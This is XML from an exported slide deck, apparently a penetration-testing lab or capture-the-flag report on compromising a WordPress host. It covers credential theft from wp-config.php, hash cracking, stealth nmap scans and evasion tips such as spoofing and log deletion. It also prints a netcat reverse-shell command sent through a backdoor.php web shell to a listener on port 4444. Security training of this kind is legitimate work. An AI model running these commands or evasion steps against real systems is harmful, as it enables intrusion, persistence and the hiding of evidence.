        <p:nvSpPr>
          <p:cNvPr id="2436" name="Google Shape;2436;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7" name="Google Shape;2437;p149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="132492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Tools and Processes</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Access to the wp-config.php file showed the username and password to the SQL database.</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credentials were used to access the users directory which showed the users with their hashed passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2438" name="Google Shape;2438;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="22470" l="0" r="60427" t="61789"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12863150" y="5138127"/>
            <a:ext cx="10323500" cy="2698050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2439" name="Google Shape;2439;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8753" l="0" r="22281" t="69659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871175" y="9029350"/>
            <a:ext cx="20315474" cy="365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Dated version of Wordpress</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2445" name="Google Shape;2445;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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="92505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Tools and Processes</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Using John the Ripper, an open source password cracking tool, the hash for steven was cracked</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ability to ssh into the system with steven’s credentials was now achieved</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2447" name="Google Shape;2447;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="891" l="0" r="17218" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10513825" y="3311950"/>
            <a:ext cx="12672825" cy="4644000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2448" name="Google Shape;2448;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="37822" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10513826" y="8534300"/>
            <a:ext cx="12672825" cy="414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pic>
        <p:nvPicPr>
          <p:cNvPr id="2453" name="Google Shape;2453;p15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54" name="Google Shape;2454;p15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55" name="Google Shape;2455;p15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t>[nmap]</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2461" name="Google Shape;2461;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2" name="Google Shape;2462;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Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="48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HTTP Request Size Monitor</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Excessive HTTP Errors.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HTTP Requests and Errors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http.response.status_code is above </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>400 for the last 5 minutes</a:t>
            </a:r>
            <a:endParaRPr b="1"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http.request.bytes over all documents is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3,500 for the last 60 seconds</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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Run the nmap scan in stealth mode. This produces a slower scan to avoid the spikes in system traffic that are set to be detected by alerts. </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap -sS -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="4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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - Additional Methods</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2468" name="Google Shape;2468;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9" name="Google Shape;2469;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In addition to executing nmap “quietly” and “slowly” to avoid detection, the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are also methods used for subverting detection. </a:t>
            </a:r>
            <a:endParaRPr b="1"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Use VPN to hide the IP address. VPN’s masks the actual IP address; making it very difficult to identify the true IP address.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Spoof the IP address. This will results in less hits from one specific IP address and may also assist in IPs that may have already been “blacklisted” on the Target.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Open ports that can be used to login at a later time. The port should be one that is not normally used, for instance, port 2222.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Delete logs that registered connection to Target system. This is more difficult to accomplish as logs tend to be large in size and could be detected when deleted. </a:t>
            </a:r>
            <a:endParaRPr sz="44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Vulnerability 101</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2475" name="Google Shape;2475;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6" name="Google Shape;2476;p15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0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2477" name="Google Shape;2477;p154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963652" y="2153927"/>
            <a:ext cx="18678301" cy="1066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pic>
        <p:nvPicPr>
          <p:cNvPr id="2482" name="Google Shape;2482;p15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3" name="Google Shape;2483;p15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84" name="Google Shape;2484;p15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Backdooring the Target</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2490" name="Google Shape;2490;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1" name="Google Shape;2491;p15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Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A reverse shell was loaded onto the target by running the exploit.sh script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./exploit.sh</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2492" name="Google Shape;2492;p156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="49854" l="0" r="1883" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053432" y="5709488"/>
            <a:ext cx="19133217" cy="6973088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2493" name="Google Shape;2493;p156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="5030625"/>
            <a:ext cx="11447275" cy="783775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">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15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Backdooring the Target</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2499" name="Google Shape;2499;p1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0" name="Google Shape;2500;p157"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="15203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Backdoor Overview</a:t>
            </a:r>
            <a:endParaRPr sz="48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Listening was activated on the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali machine on port 4444  </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc -lnvp 4444</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The backdoor was activated by entering in the browser,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115/backdoor.php?cmd=nc 192.168.1.90 4444 -e /bin/bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From there access was </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>granted to the target</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2501" name="Google Shape;2501;p157"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="69497" l="0" r="51444" t="17184"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14360950" y="3759525"/>
            <a:ext cx="8287825" cy="838450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2502" name="Google Shape;2502;p157"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="49771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606525" y="6934300"/>
            <a:ext cx="20888225" cy="1018625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2503" name="Google Shape;2503;p157"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="0" r="0" t="17067"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9583592" y="9007425"/>
            <a:ext cx="13603058" cy="367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61" name="Google Shape;2361;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2" name="Google Shape;2362;p14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t>This document contains the following resources:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2363" name="Google Shape;2363;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184992" y="38804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a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2364" name="Google Shape;2364;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119808" y="61085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Exploits Used</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Google Shape;2365;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="83558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Avoiding Detect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2366" name="Google Shape;2366;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119609" y="106030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Maintaining Access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15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Appendix- The Proof is in the Flags! </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2509" name="Google Shape;2509;p1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0" name="Google Shape;2510;p15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Target 1 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>																</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2511" name="Google Shape;2511;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19559" l="0" r="41547" t="34932"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="5988225"/>
            <a:ext cx="7610575" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2512" name="Google Shape;2512;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="12959" l="0" r="0" t="61088"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="11492436"/>
            <a:ext cx="7610575" cy="1187214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2513" name="Google Shape;2513;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15789" l="53772" r="12531" t="76771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="5105154"/>
            <a:ext cx="7610575" cy="632734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2514" name="Google Shape;2514;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21160" l="0" r="64006" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="8423275"/>
            <a:ext cx="7610575" cy="1122025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2515" name="Google Shape;2515;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14807" l="0" r="63480" t="58392"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="9846473"/>
            <a:ext cx="7610575" cy="1423200"/>
          </a:xfrm>
